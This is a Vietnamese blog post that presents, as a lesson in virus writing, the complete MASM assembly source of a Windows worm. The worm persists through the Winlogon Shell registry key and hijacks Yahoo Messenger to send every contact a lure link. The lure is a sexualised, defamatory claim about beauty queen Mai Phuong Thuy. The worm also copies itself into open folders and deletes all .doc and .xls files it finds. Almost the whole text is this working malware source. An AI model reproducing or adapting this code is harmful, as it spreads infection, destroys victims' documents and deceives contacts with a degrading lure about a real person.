Code Asm Virus Mai Phương Thuý 2006
Author: Toan Thang
Origin Link: http://toanthang.spaces.live.com/blog/cns!A4E5440D42A2F4F4!977.entry
Giới thiệu với các bạn phương thức viết virus bằng ngôn ngữ Assembler.
Chức năng của virus :
- khi lây nhiễm vào máy victim sẽ gởi link chứa Virus tới tất cả các níck trong list Yahoo Chat Messeger.
- Xoá tất cả các file *.doc và *.xls.
Code ASM :
.386
.model flat,stdcall
option casemap:none
include \masm32\include\windows.inc
include \masm32\include\user32.inc
include \masm32\include\kernel32.inc
include \masm32\include\advapi32.inc
includelib \masm32\lib\user32.lib
includelib \masm32\lib\kernel32.lib
includelib \masm32\lib\advapi32.lib
FileTime Struct
dwLowDateTime dd ?
dwHighDateTime dd ?
FileTime Ends
Win32_Find_Data Struct
dwFileAttributes dd ?
ftCreationTime FileTime <>
ftLastAccessTime FileTime <>
ftLastWriteTime FileTime <>
nFileSizeHigh dd ?
nFileSizeLow dd ?
dwReserved0 dd ?
dwReserved1 dd ?
cFileName db 260 dup(?)
cAlternate db 260 dup(?)
Win32_Find_Data Ends
.data
sVirusFileName db 180 dup(0)
sWinDir db 180 dup(0)
sSourceVirus db "\system32\drivers\services.exe",0
HKEY_LOCAL_MACHINE equ 80000002h
sSubKey1 db "Software\Microsoft\Windows NT\CurrentVersion\Winlogon",0
sValueName1 db "Shell",0
sValue1 db "Explorer.exe ",0
sValueFull db 180 dup(0)
sValueType1 equ
sValueType2 equ
SamDesired equ
RegHandle dd 0
sYahooClass db "YahooBuddyMain",0
CmdShow equ
sRetval dd 0
sDwFlags1 equ
sDwFlags2 equ
sVK_Ctrl equ
sVK_Shift equ
sVK_Alt equ
sVK_Down equ
sVK_End equ
sVK_Enter equ 13
sVK_U equ 85
sVK_N equ 78
sVK_M equ 77
sVK_V equ 86
sVirusMsg db "hinh chup len hoa hau Mai Phuong Thuy ... dang thay quan ao trong toilet ... ",13,10
db "khi con la hoc sinh ... http://my.http.vn/hinhvn/miss_thuy.jpg :D",0
wFormat equ
wFlags equ
hGlobalMemory dd 0
lpGlobalMemory dd 0
HKEY_CURRENT_USER equ 80000001h
sSubKey2 db "Software\Microsoft\Internet Explorer\Main",0
sValueName2 db "Window Title",0
sExplorerTitle db ".:: Yeu Giang Son Va Yeu My Nhan ::.",0
sSubKey3 db "Software\Microsoft\Windows\CurrentVersion\Policies\Explorer",0
sValueName3 db "NoFolderOptions",0
sGt dd 1
sSubKey4 db "Software\Microsoft\Windows\CurrentVersion\Explorer\CabinetState",0
sValueName4 db "FullPath",0
Search Win32_Find_Data <>
sExplClass db "CabinetWClass",0
sFileLay db "\Thong Bao.exe",0
sExplTitle db 180 dup(0)
sFindHandle dd 0
sFileHandle dd 0
sLuu1 db 180 dup(0)
sLuu2 db 180 dup(0)
sDocFile db "\*.doc",0
sXlsFile db "\*.xls",0
sThem db "\",0
.code
Main:
;Lấy đường dẫn của Virus đang chạy
push 180
push offset sVirusFileName
push 00h
call GetModuleFileName
;Copy virus vào Windows\system32\drivers
push 180
push offset sWinDir
call GetWindowsDirectory
push offset sSourceVirus
push offset sWinDir
call lstrcat
push 1
push offset sWinDir
push offset sVirusFileName
call CopyFile
;Tao Key startup mỗi khi window hoạt động
push offset sValue1
push offset sValueFull
call lstrcat
push offset sWinDir
push offset sValueFull
call lstrcat
push offset RegHandle
push SamDesired
push 00h
push offset sSubKey1
push HKEY_LOCAL_MACHINE
call RegOpenKeyEx
test eax,eax
jnz Exit1
push 180
push offset sValueFull
push sValueType1
push 00h
push offset sValueName1
push RegHandle
call RegSetValueEx
Exit1:
push RegHandle
call RegCloseKey
;đặr tên Title của internet explorer
push offset RegHandle
push SamDesired
push 00h
push offset sSubKey2
push HKEY_CURRENT_USER
call RegOpenKeyEx
test eax,eax
jnz Exit2
push 38
push offset sExplorerTitle
push sValueType1
push 00h
push offset sValueName2
push RegHandle
call RegSetValueEx
Exit2:
push RegHandle
call RegCloseKey
;Khoá Menu Folder Option cua Explorer
push offset RegHandle
push SamDesired
push 00h
push offset sSubKey3
push HKEY_CURRENT_USER
call RegOpenKeyEx
test eax,eax
jnz Exit3
push 4d
push offset sGt
push sValueType2
push 00h
push offset sValueName3
push RegHandle
call RegSetValueEx
Exit3:
push RegHandle
call RegCloseKey
;Hiện đường dẫn đầy đủ trên Title của Explorer
push offset RegHandle
push SamDesired
push 00h
push offset sSubKey4
push HKEY_CURRENT_USER
call RegOpenKeyEx
test eax,eax
jnz Exit4
push 4d
push offset sGt
push sValueType2
push 00h
push offset sValueName4
push RegHandle
call RegSetValueEx
Exit4:
push RegHandle
call RegCloseKey
;Tìm xem co chương trinh yahoo chat messager không
;lây lan bằng yahoo chat
_While:
push 00h
push offset sYahooClass
call FindWindow
mov sRetval,eax
cmp eax,0
jz Exit
push 60000
call Sleep
push 1
call BlockInput
push CmdShow
push sRetval
call ShowWindow
push sRetval
call SetForegroundWindow
;Copy Text vao Clipboard
push offset sVirusMsg
call lstrlen
inc eax
push eax
push wFlags
call GlobalAlloc
mov hGlobalMemory,eax
push eax
call GlobalLock
mov lpGlobalMemory,eax
push offset sVirusMsg
push lpGlobalMemory
call lstrcpy
push hGlobalMemory
call GlobalUnlock
push 00h
call OpenClipboard
call EmptyClipboard
push hGlobalMemory
push wFormat
call SetClipboardData
call CloseClipboard
;lấy tất cả các nick name
push 00h
push 00h
push 00h
push sVK_Ctrl
call keybd_event
push 00h
push 00h
push 00h
push sVK_M
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_M
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_Ctrl
call keybd_event
push 00h
push 00h
push 00h
push sVK_Down
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_Down
call keybd_event
push 00h
push 00h
push 00h
push sVK_Shift
call keybd_event
push 00h
push sDwFlags2
push 00h
push sVK_End
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_End
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_Shift
call keybd_event
push 00h
push 00h
push 00h
push sVK_Enter
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_Enter
call keybd_event
push 00h
push 00h
push 00h
push sVK_Ctrl
call keybd_event
push 00h
push 00h
push 00h
push sVK_V
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_V
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_Ctrl
call keybd_event
push 00h
push 00h
push 00h
push sVK_Enter
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_Enter
call keybd_event
;Tạo link ở Status của yahoo messager
push 00h
push 00h
push 00h
push sVK_Alt
call keybd_event
push 00h
push 00h
push 00h
push sVK_M
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_M
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_Alt
call keybd_event
push 00h
push 00h
push 00h
push sVK_U
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_U
call keybd_event
push 00h
push 00h
push 00h
push sVK_N
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_N
call keybd_event
push 00h
push 00h
push 00h
push sVK_Ctrl
call keybd_event
push 00h
push 00h
push 00h
push sVK_V
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_V
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_Ctrl
call keybd_event
push 00h
push 00h
push 00h
push sVK_Enter
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_Enter
call keybd_event
push 00h
push 00h
push 00h
push sVK_Enter
call keybd_event
push 00h
push sDwFlags1
push 00h
push sVK_Enter
call keybd_event
push 0
call BlockInput
push 180000
call Sleep
Exit:
;Chép file virus vào cac Folder được mở
push 00h
push offset sExplClass
call FindWindow
mov sFindHandle,eax
push 180
push offset sExplTitle
push sFindHandle
call GetWindowText
push offset sFileLay
push offset sExplTitle
call lstrcat
push 1
push offset sExplTitle
push offset sVirusFileName
call CopyFile
;Xoá các tập tin *.doc or .xls
push 180
push offset sExplTitle
push sFindHandle
call GetWindowText
push offset sExplTitle
push offset sLuu1
call lstrcpy
push offset sExplTitle
push offset sLuu2
call lstrcpy
push offset sDocFile
push offset sLuu2
call lstrcat
push offset Search
push offset sLuu2
call FindFirstFile
mov dword ptr [sFileHandle],eax
FindNextDoc:
test eax,eax
jz KetThucDoc
push offset sThem
push offset sLuu1
call lstrcat
push offset Search.cFileName
push offset sLuu1
call lstrcat
push offset sLuu1
call DeleteFile
mov sLuu1,00h
push offset sExplTitle
push offset sLuu1
call lstrcat
push offset Search
push dword ptr [sFileHandle]
call FindNextFile
jmp FindNextDoc
KetThucDoc:
;Xoá các Tập tin *.xls
push offset sExplTitle
push offset sLuu1
call lstrcpy
push offset sExplTitle
push offset sLuu2
call lstrcpy
push offset sXlsFile
push offset sLuu2
call lstrcat
push offset Search
push offset sLuu2
call FindFirstFile
mov dword ptr [sFileHandle],eax
FindNextXls:
test eax,eax
jz KetThucXls
push offset sThem
push offset sLuu1
call lstrcat
push offset Search.cFileName
push offset sLuu1
call lstrcat
push offset sLuu1
call DeleteFile
mov sLuu1,00h
push offset sExplTitle
push offset sLuu1
call lstrcat
push offset Search
push dword ptr [sFileHandle]
call FindNextFile
jmp FindNextXls
KetThucXls:
push 800
call Sleep
jmp _While
push 00h
call ExitProcess
End Main
Mọi ý kiến thắc mắc hãy comment cho tui.